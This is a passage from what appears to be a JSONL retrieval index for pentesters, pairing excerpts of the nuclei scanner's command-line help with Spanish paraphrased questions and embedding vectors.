-templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "con que puedo listar o validar las plantillas de seguridad disponibles en la ΓΊltima versiΓ³n?", "v": [0.17538, 0.12391, -0.19031, -0.16927, 0.02123, -0.10869, 0.08271, -0.15323, 0.01141, -0.12584, 0.08674, -0.188, 0.07213, -0.00677, 0.04053, 0.06169, -0.03596, -0.1476, 0.04073, 0.00982, 0.03234, -0.08867, -0.15354, -0.12741, -0.05161, 0.02153, 0.05911, -0.02646, -0.14305, -0.03621, -0.00792, 0.00083, -0.03882, -0.01502, 0.00469, 0.08198, -0.06219, 0.03723, -0.09357, 0.03145, -0.02721, 0.05907, 0.12779, -0.05248, 0.03201, -0.03041, 0.04367, 0.04872, 0.08759, -0.02591, -0.07321, 0.02926, 0.01163, -0.0343, -0.0111, -0.05052, 0.14417, -0.06524, 0.07588, -0.01445, -0.11994, 0.02766, 0.06559, 0.09107, -0.02993, 0.02523, -0.01655, -0.02971, -0.08979, -0.0123, -0.05686, 0.05102, 0.03946, -0.01165, -0.11202, -0.10849, -0.02112, -0.03117, -0.01438, 0.20543, 0.00621, -0.0628, -0.0052, 0.00792, -0.11901, -0.04028, -0.03119, -0.05629, -0.0265, -0.05104, 0.09069, 0.00155, 0.00558, -0.02737, -0.04388, -0.06126, 0.09553, 0.00967, -0.0414, -0.05265, -0.05233, 0.02614, -0.01204, 0.00696, -0.01047, 0.02451, 0.01364, 0.0237, 0.057, -0.05135, 0.0023, -0.01679, -0.05653, -0.0124, -0.05286, 0.02332, -0.03146, 0.01308, 0.02179, -0.06243, 0.01037, -0.05363, -0.03046, -0.04387, 0.11727, 0.03262, -0.0305, 0.09861, -0.06828, -0.08246, -0.05498, -0.06813, -0.12029, -0.02597, -0.08793, 0.04134, -0.03258, -0.02109, 0.03078, -0.07377, 0.00428, 0.03176, 0.07357, 0.00549, 0.05279, 0.03875, -0.02973, -0.02817, -0.0733, -0.01238, 0.00866, 0.06655, 0.02645, 0.13293, -0.03507, 0.04979, -0.00061, -0.04792, 0.04979, 0.10656, 0.03691, 0.03778, -0.08851, 0.01228, -0.01143, 0.04004, -0.00055, -0.04471, 0.02994, 0.00209, 0.08614, 0.01043, 0.01377, -0.05715, 0.01862, -0.02662, -0.02526, -0.0169, -0.00267, -0.03875, -0.02211, 0.01356, -0.0705, -0.06697, 0.05367, -0.08213, -0.01368, 0.05822, 0.01824, 0.02275, -0.02239, 0.09711, -0.00056, -0.00165, -0.03161, 0.01101, 0.04251, 0.01839, -0.03358, 0.00067, -0.11864, -0.04274, -0.09614, -0.05973, 0.0951, 0.0756, -0.01712, 0.07821, 0.00754, 0.00036, 0.00686, 0.00045, 0.04503, -0.06736, 0.00651, -0.06277, 0.03408, -0.03112, 0.01315, -0.00456, -0.01131, 0.05298, 0.06417, -0.04198, 0.02234, -0.01855, -0.01718, -0.02098, 0.03359, 0.06096, 0.04393, 0.05577, -0.03044, -0.05838, 0.06788, -0.01161, 0.02606, -0.002, -0.04914, -0.07331, -0.01649, 0.04605, -0.02702, -0.07798, -0.03589, -0.06581, -0.0864, 0.03467, 0.06938, -0.11165, -0.02237, 0.08022, 0.02967, -0.1048, 0.02506, -0.07261]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "que herramienta puedo usar para filtrar plantillas segΓΊn su autor o etiquetas", "v": [0.17258, 0.05642, -0.14036, -0.19517, 0.1155, -0.11221, -0.00781, -0.11664, -0.04703, -0.07469, -0.01546, 0.04456, 0.0305, -0.02574, 0.04515, -0.01835, 0.04916, -0.23909, 0.03718, -0.04411, -0.07852, -0.039, -0.23629, -0.12383, -0.15386, -0.00831, 0.064, 0.02338, -0.16186, 0.08916, -0.02123, 0.12731, 0.05547, -0.07833, -0.12781, -0.01725, -0.01452, 0.01329, -0.03296, 0.0542, -0.02893, 0.10155, -0.07785, 0.05464, -0.0031, 0.0361, -0.03784, 0.00389, 0.01392, 0.11583, -0.03986, -0.12372, -0.0931, 0.03348, -0.05416, -0.10999, 0.23464, -0.07701, 0.07086, -0.079, -0.05216, 0.00113, 0.09298, 0.07972, -0.04353, -0.09827, 0.00138, -0.02338, -0.09533, 0.02696, -0.01909, 0.0028, 0.03296, -0.0345, 0.01653, 0.03305, 0.04227, -0.01, 0.02239, 0.02241, 0.05174, -0.11793, -0.01587, 0.00988, -0.07903, -0.01812, 0.09337, -0.05273, -0.01181, -0.11673, -0.03652, -0.00158, -0.05063, -0.04939, 0.00064, -0.02766, 0.07263, 0.00615, 0.03862, -0.00582, 0.09868, -0.05779, 0.01575, 0.04148, -0.01805, -0.0406, 0.00123, -0.08043, -0.02165, -0.03385, 0.04132, 0.01714, -0.00533, -0.03239, -0.00984, 0.06994, 0.08417, -0.03385, -0.02346, -0.05522, 0.06512, -0.04849, -0.10722, -0.09799, 0.11122, 0.04397, 0.03779, 0.07552, -0.06299, -0.08006, -0.07427, 0.02646, -0.07644, 0.0055, -0.04931, -0.0048, -0.0072, -0.09003, -0.01952, -0.04349, -0.0256, 0.0432, -0.03624, -0.00407, 0.01656, -0.00472, -0.0085, -0.05607, -0.09323, 0.00273, 0.12446, -0.04206, 0.06633, 0.02416, -0.04341, 0.02573, 0.06316, -0.04729, -0.04943, 0.03219, -0.04188, 0.01418, -0.02538, 0.04897, 0.04739, 0.01656, 0.04883, -0.06168, 0.05525, 0.05089, 0.10726, 0.08981, 0.03246, -0.01222, 0.05729, -0.02305, -0.02417, 0.00768, -0.01703, 0.01108, -0.01342, 0.01652, -0.05579, -0.07746, 0.04372, -0.00266, 0.00987, -0.01818, -0.02731, 0.06398, -0.01361, 0.05583, 0.03532, -0.01496, 0.01405, 0.01375, 0.00422, -0.00327, -0.00362, -0.0321, -0.06701, 0.00728, -0.09175, -0.03306, 0.07618, 0.00895, -0.0708, 0.0168, 0.01388, 0.03309, 0.02684, -0.02562, -0.00813, -0.06435, -0.0095, 0.02124, -0.01632, -0.04441, 0.04143, 0.03451, 0.02654, 0.05482, 0.06253, -0.00102, 0.02016, 0.03898, 0.00612, 0.00723, 0.00756, 0.02113, 0.01896, -0.0281, -0.06394, -0.02895, -0.01202, -0.02262, 0.04337, -0.0099, -0.06126, -0.03503, -0.04475, 0.03106, 0.00505, -0.0192, -0.01753, -0.0574, -0.04231, -0.04672, 0.0053, -0.09839, -0.00706, 0.04128, 0.07279, -0.03282, 0.06173, -0.04955]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "cual programa me permite seleccionar scripts por nivel de severidad", "v": [0.04371, -0.01627, -0.11227, -0.15707, 0.05476, -0.20358, -0.08132, -0.15165, -0.03282, -0.11318, -0.04861, -0.03647, 0.0292, -0.24452, 0.06379, 0.06324, 0.01665, -0.13996, 0.14646, 0.07831, 0.09123, -0.00876, -0.00677, -0.10336, -0.07634, -0.0269, 0.08229, 0.03232, -0.05912, -0.0313, -0.03704, 0.03311, 0.08383, -0.10169, 0.05751, -0.017, 0.06533, 0.07315, -0.01138, 0.06479, 0.03119, 0.00887, -0.04355, 0.02337, 0.10571, -0.09274, 0.03552, 0.03495, 0.01991, -0.09091, 0.07903, 0.04139, -0.03395, 0.00774, -0.00441, 0.02844, 0.01236, -0.12903, -0.04608, 0.03483, -0.01122, -0.0235, 0.05929, -0.09674, 0.08282, 0.00836, 0.05152, -0.01291, -0.10364, 0.07454, -0.00298, 0.00946, 0.04051, 0.02304, 0.03751, 0.04546, -0.07692, -0.11234, 0.05933, -0.07457, -0.02218, -0.07195, 0.02142, 0.11609, -0.04353, -0.14807, -0.06547, -0.01934, -0.07408, -0.06344, 0.07866, -0.02077, 0.07433, 0.01934, 0.03558, -0.11697, 0.12276, 0.06918, 0.03156, 0.05387, 0.02774, -0.08012, -0.04967, 0.14278, -0.00119, 0.10523, 0.1232, 0.05954, -0.02128, 0.04714, 0.06505, 0.06037, 0.01168, 0.02173, -0.10937, 0.00549, 0.01993, 0.02074, 0.0549, -0.04543, -0.12569, 0.0684, -0.10443, -0.02666, 0.10065, 0.01776, 0.00692, 0.00318, -0.05738, 0.04446, -0.06237, 0.0383, -0.01292, -0.09215, -0.05961, 0.01878, 0.08998, -0.00788, -0.00849, -0.03925, 0.03766, 0.03543, 0.08298, 0.07546, 0.05977, -0.04309, -0.04756, -0.10488, 0.00461, 0.01285, -0.03145, 0.0483, 0.00743, 0.06192, -0.01076, -0.11159, 0.02066, -0.05969, -0.07837, 0.00294, 0.01595, 0.00549, -0.0794, -0.00636, 0.06769, -0.03752, -0.01972, 0.02993, 0.09648, 0.05899, -0.03163, 0.0279, 0.05948, -0.06641, -0.03589, -0.07057, -0.00954, -0.11841, -0.0095, -0.00306, -0.03924, 0.02511, 0.08691, 0.01119, -0.03172, -0.04714, -0.07756, 0.03109, -0.01318, -0.00065, -0.01646, 0.07761, -0.08516, -0.05066, 0.00315, 0.00041, -0.0268, -0.03, 0.00927, -0.05329, -0.06702, -0.01717, 0.02578, -0.03713, 0.02938, 0.07823, -0.01568, -0.01766, 0.00866, 0.04407, 0.02167, 0.0045, 0.04962, 0.02594, 0.03007, -0.02553, 0.0127, 0.04379, 0.029, -0.02282, -0.02431, -0.10443, 0.05642, -0.01568, -0.0266, -0.05418, 0.04369, -0.00839, -0.02456, 0.04452, 0.01691, -0.06071, -0.04259, -0.01953, 0.00836, -0.0226, -0.01777, -0.03997, -0.03079, -0.07673, -0.0295, 0.11215, -0.02112, -0.09402, -0.01741, 0.01039, -0.04534, 0.02656, 0.00986, 0.02054, -0.04042, 0.01759, 0.02266, -0.09124, 0.0626, 0.00269]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "indexar": "con que software puedo ejecutar solo aquellas plantillas especΓ­ficas por tipo de protocolo", "v": [0.07701, 0.07438, -0.19318, -0.19821, 0.00599, -0.16864, 0.21457, -0.1435, -0.08919, -0.04699, 0.08875, 0.12519, 0.12124, -0.11005, 0.01004, -0.02761, 0.04091, -0.1496, 0.10321, -0.02729, -0.05033, -0.10308, -0.2032, -0.03941, 0.03573, 0.00939, 0.05697, 0.00758, -0.13232, -0.03085, 0.01698, 0.01477, 0.08057, -0.08272, 0.00076, 0.06634, -0.0501, 0.03166, -0.1245, 0.02797, -0.0252, 0.02859, -0.0767, 0.02073, 0.08166, -0.01132, 0.00855, 0.01574, 0.03637, -0.02531, 0.02924, 0.01185, -0.01752, -0.0766, -0.02434, -0.04366, 0.15705, -0.03033, -0.01352, -0.03557, -0.0578, -0.02282, 0.09611, 0.04388, 0.03918, 0.00373, 0.03453, -0.04711, -0.07832, -0.0164, -0.05218, 0.00327, 0.06817, -0.06945, 0.10725, -0.0816, -0.08989, 0.01996, 0.00411, 0.12089, -0.02085, -0.01739, 0.00277, 0.08102, -0.1163, -0.02522, -0.07078, 0.00349, 0.07984, -0.10737, 0.08316, -0.00026, -0.1103, 0.0441, 0.01856, -0.04115, 0.08824, 0.06212, 0.02526, 0.06146, -0.0427, -0.03697, -0.04175, 0.04827, 0.01154, 0.0258, 0.00226, -0.05722, 0.0214, -0.08016, -0.03434, 0.0585, 0.05036, -0.08518, -0.04943, -0.03187, -0.01147, -0.03632, 0.00596, -0.04411, -0.0111, -0.03743, -0.0704, 0.00485, 0.05634, -0.01844, -0.01886, 0.14066, -0.03183, -0.00605, -0.08228, -0.05149, -0.05946, -0.00578, -0.06448, 0.04666, 0.03188, -0.01223, -0.01389, -0.03898, 0.02148, 0.04031, -0.04049, 0.07422, 0.09003, -0.06686, -0.02184, -0.08603, -0.09523, 0.01495, 0.09369, 0.04588, -0.00265, 0.05716, -0.16471, -0.02218, 0.0513, -0.00161, 0.02123, 0.06737, -0.05527, 0.09862, -0.06109, -0.03997, 0.0383, 0.03988, -0.04571, -0.05757, 0.04677, 0.0741, 0.06196, 0.06834, 0.01729, -0.02609, -0.01521, -0.01064, -0.09911, -0.07935, -4e-05, 0.01545, -0.06329, 0.05055, 0.04856, -0.03797, 0.03792, -0.03553, -0.0279, 0.03209, 0.00059, 0.01752, -0.02906, 0.05165, 0.04213, -0.01779, 0.00491, 0.04182, -0.02689, 0.07452, -0.09607, -0.07005, -0.03729, -0.01017, -0.00743, -0.05401, 0.06715, 0.0767, -0.08593, 0.04418, -0.02331, 0.09466, 0.02829, 0.01441, 0.04507, 0.01413, -0.04699, -0.00697, -0.0315, -0.00185, 0.06554, -0.015, 0.01612, -0.01447, 0.10125, -0.00923, -0.03094, -0.01394, -0.01597, 0.03801, 0.00763, -0.00526, -0.01801, 0.03362, -0.00983, 0.01004, 0.01613, 0.01407, -0.00776, -0.08001, -0.05261, -0.0385, -0.0104, 0.03946, -0.018, -0.06328, -0.00939, -0.04214, -0.07364, -0.04413, 0.03367, -0.04809, -0.02522, 0.04718, 0.06352, -0.01691, 0.02842, -0.05689]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "indexar": "que herramienta sirve para encontrar vulnerabilidades en sitios web?", "v": [0.04001, 0.05605, -0.19952, -0.17326, 0.0373, -0.13062, -0.08298, -0.11818, 0.0403, -0.07436, -0.00272, -0.09508, -0.03401, -0.05446, 0.06537, 0.08053, 0.07503, -0.18079, 0.04182, -0.04605, -0.04766, -0.00629, -0.06701, -0.00697, -0.1563, -0.02726, 0.05474, -0.05746, -0.15447, 0.06785, 0.00959, -0.01938, 0.01084, 0.02854, -0.11149, -0.02333, 0.02597, 0.03584, -0.02547, -0.00456, 0.0611, 0.02038, -0.06292, 0.04262, -0.00975, -0.01713, -0.10283, -0.08735, 0.01497, 0.07058, -0.07858, -0.10806, -0.19156, -0.04056, 0.01516, -0.07858, 0.21389, -0.11825, 0.05417, -0.03817, -0.18867, 0.04073, -0.02022, -0.02552, 0.01812, -0.00759, -0.01625, 0.04448, -0.11624, 0.02988, 0.00747, 0.00538, 0.0741, -0.03594, 0.04356, -0.03005, 0.04353, 0.05352, 0.0047, -0.03868, 0.06894, 0.00739, -0.04398, 0.02921, -0.1692, -0.05716, 0.08075, -0.0491, 0.06496, -0.09659, 0.10998, 0.12493, -0.06536, -0.00886, -0.04616, -0.11106, 0.10083, -0.03221, 0.01469, -0.0423, 0.05542, -0.06433, -0.05386, 0.03124, 0.00993, 0.08235, -0.01476, 0.00568, -0.05052, -0.04131, 0.06261, -0.03401, -0.01383, -0.01248, -0.02506, 0.07633, 0.04772, -0.03074, 0.0742, -0.06601, -0.01688, -0.01386, -0.10494, 0.00386, -0.06964, 0.0582, 0.01108, 0.0214, -0.0105, -0.13314, 0.01782, -0.09206, -0.0721, 0.07463, -0.00863, 0.01625, 0.08271, -0.07147, 0.00649, -0.01712, 0.04444, -0.00595, -0.03433, -0.04126, -0.00228, 0.03567, 0.0585, -0.02149, -0.08565, 0.01178, -0.03517, -0.00162, -0.04334, 0.00177, -0.04039, 0.00614, -0.10637, -0.00524, -0.09799, 0.04073, -0.02225, 0.01987, 0.05053, 0.03406, 0.01218, -0.0033, 0.00356, 0.09278, 0.10402, 0.05891, 0.0275, 0.0866, 0.05693, -0.08753, -0.0081, -0.03915, -0.03337, -0.01269, 0.02624, -0.08698, -0.0056, -0.07085, -0.0384, 0.02438, -0.00804, -0.01272, 0.0733, -0.04981, -0.00439, 0.04354, -0.03248, -0.04034, -0.02447, 0.00356, 0.06417, 0.02257, -0.01397, -0.03738, 0.04899, -0.07178, -0.06779, -0.04075, -0.03967, -0.03306, 0.02485, 0.11219, 0.00416, -0.1005, -0.03101, 0.03865, -0.01917, 0.00754, 0.03065, -0.08708, -0.02841, -0.11048, 0.05773, 0.01813, -0.06103, -0.00588, 0.0206, -0.04263, -0.00911, 0.028, 0.04342, 0.01863, 0.00927, -0.04522, 0.01007, 0.02898, 0.03145, -0.06117, -0.04699, -0.03466, 0.03113, -0.08284, 0.00176, 0.01888, -0.06297, -0.01816, -0.03258, -0.0092, 0.00612, -0.04599, 0.02208, -0.08608, -0.02905, -0.04201, -0.0165, -0.03909, -0.0793, -0.01888, 0.0427, -0.04512, 0.00347, -0.03935]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "indexar": "con quΓ© puedo escanear una aplicaciΓ³n web buscando fallos de seguridad?", "v": [-0.02138, 0.09395, -0.13034, -0.10437, -0.03801, -0.08443, -0.08431, -0.12127, -0.00737, 0.08437, -0.16892, -0.08055, -0.12826, -0.00199, 0.03653, -0.00321, 0.03079, -0.04589, 0.03085, 0.05593, -0.04599, -0.07679, -0.13561, -0.05859, -0.11217, 0.06669, -0.09556, 0.01327, -0.10214, -0.10974, 0.05713, 0.02399, 0.08323, 0.0239, -0.12676, 0.04744, -0.01727, -0.01088, 0.02785, 0.04344, -0.01311, -0.03025, -0.13329, -0.0924, -0.03343, -0.08189, -0.05609, -0.02906, 0.02067, -0.00101, -0.09027, -0.15004, -0.02565, 0.02076, -0.004, -0.10431, 0.15146, -0.04796, 0.13167, -0.05151, -0.19993, -0.02482, 0.04389, 0.03449, 0.01249, -0.08551, 0.06656, 0.16493, -0.03229, -0.01764, -0.01097, 0.03981, -0.02992, 0.10177, 0.05617, -0.04581, -0.05193, 0.03906, 0.12414, 0.08858, -0.05008, 0.03636, -0.14245, 0.03837, -0.09464, -0.01272, 0.00067, -0.03517, -0.0366, -0.03927, 0.0399, 0.03922, 0.02785, -0.03046, -0.03769, -0.06363, 0.10437, 0.00309, 0.00087, -0.01601, -0.00813, -0.12635, -0.05308, 0.02695, -0.00148, 0.02864, 0.01135, 0.02563, -0.02739, -0.04509, -0.02237, -0.04706, -0.00521, -0.00644, -0.118, 0.02833, -0.05521, -0.08504, 0.03705, -0.05193, -0.02526, -0.03838, 0.00241, -0.04952, 0.06812, 0.01023, 0.02617, 0.10742, -0.0395, -0.00598, 0.0655, -0.11007, -0.18728, -0.00722, -0.00783, 0.03463, 0.03341, -0.06104, -0.01196, 0.00271, 0.04868, -0.06489, -0.02153, 0.02437, 0.04044, 0.04711, -0.01972, -0.029, -0.07467, -0.06542, -0.00801, -0.02625, -0.1023, 0.02518, -0.1002, 0.03741, -0.04428, -0.05958, 0.03026, 0.02101, -0.04164, 0.03635, 0.0015, 0.03606, -0.02746, -0.0409, 0.00232, -0.06055, 0.00043, 0.00457, -0.0302, 0.10699, -0.04363, -0.19211, 0.00578, -0.00499, -0.04947, -0.06129, 0.01467, -0.0644, -0.02943, -0.0217, 0.00957, 0.08474, 0.07797, -0.12088, 0.03559, 0.01454, -0.01373, 0.00427, 0.04043, 0.05886, -0.05275, -0.0003, -0.04507, -0.00294, 0.0075, -0.07516, -0.03678, -3e-05, -0.07314, -0.01632, -0.00956, -0.07562, 0.056, 0.0263, -0.01128, 0.00879, 0.00966, 0.02231, 0.04414, -0.02235, 0.08114, -0.02849, -0.0268, -0.04072, 0.0895, 0.07537, -0.08591, -0.02324, 0.02263, -0.01195, 0.01299, 0.00958, -0.03407, -0.00349, 0.01373, -0.03295, -0.03024, 0.04774, -0.0032, -0.06126, -0.13006, -0.06961, 0.07714, -0.01494, 0.01239, -0.05332, -0.06404, -0.03938, -0.0304, 0.06956, 0.00029, -0.01775, -0.03161, -0.07453, -0.06461, 0.02934, -0.00698, -0.0622, -0.02796, 0.03515, 0.00578, -0.06425, 0.02776, -0.03527]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "indexar": "que herramienta sirve para probar la vulnerabilidad de mis servidores web", "v": [0.07377, 0.01706, -0.20229, -0.21218, 0.02003, -0.07549, -0.02667, -0.09915, 0.02645, -0.09721, -0.02325, -0.01595, 0.06362, -0.08446, 0.00824, 0.0974, 0.10877, -0.15389, 0.00491, 0.05829, 0.04175, 0.00482, -0.03701, -0.03955, -0.1238, 0.03843, 0.01338, -0.09972, -0.08897, 0.01697, -0.07553, -0.05081, 0.06161, -0.01218, -0.06649, 0.02976, -0.07197, 0.07158, 0.00905, 0.10677, 0.0958, 0.02969, -0.07215, 0.0166, 0.02064, -0.00911, -0.06129, -0.08999, -0.01188, 0.12899, -0.10971, -0.11869, -0.15786, -0.03438, -0.04817, -0.06156, 0.13369, -0.13363, 0.03926, -0.01353, -0.15988, 0.02412, -0.00493, -0.03377, 0.0578, -0.07822, -0.0751, -0.02578, -0.16672, 0.03696, -0.02407, 0.05276, 0.00531, -0.079, -0.04018, -0.0068, -0.0322, 0.01547, 0.05076, -0.00291, 0.05303, 0.05743, -0.04657, 0.08224, -0.17394, -0.11995, 0.10911, 0.00032, 0.08056, -0.05782, 0.0906, 0.1037, -0.05518, 0.03291, 0.01989, -0.03695, 0.15725, -0.07966, 0.02616, -0.04234, 0.10411, -0.06294, -0.05438, 0.03219, -0.01759, 0.09014, 0.01215, -0.01062, 0.00572, -0.0969, 0.05046, -0.09826, -0.08614, 0.02264, -0.02406, 0.02845, -0.01479, -0.02416, 0.02735, -0.01667, -0.02195, -0.02322, -0.0365, 0.03156, -0.00839, 0.02297, 0.00544, -0.01388, 0.00431, -0.08062, 0.00463, -0.03301, -0.07952, 0.09362, -0.02042, 0.00657, 0.07512, -0.10718, -0.0174, -0.02766, 0.04266, 0.04429, -0.0325, -0.0239, 0.04261, 0.02122, 0.07729, 0.01894, -0.08758, 0.01931, -0.03118, -0.04309, -0.04002, 0.03075, -0.12435, -0.04691, -0.02865, -0.05788, -0.10327, 0.05949, -0.04185, 0.02385, 0.0378, 0.11615, 0.0447, -0.01338, 0.02583, 0.03197, 0.12608, 0.03503, 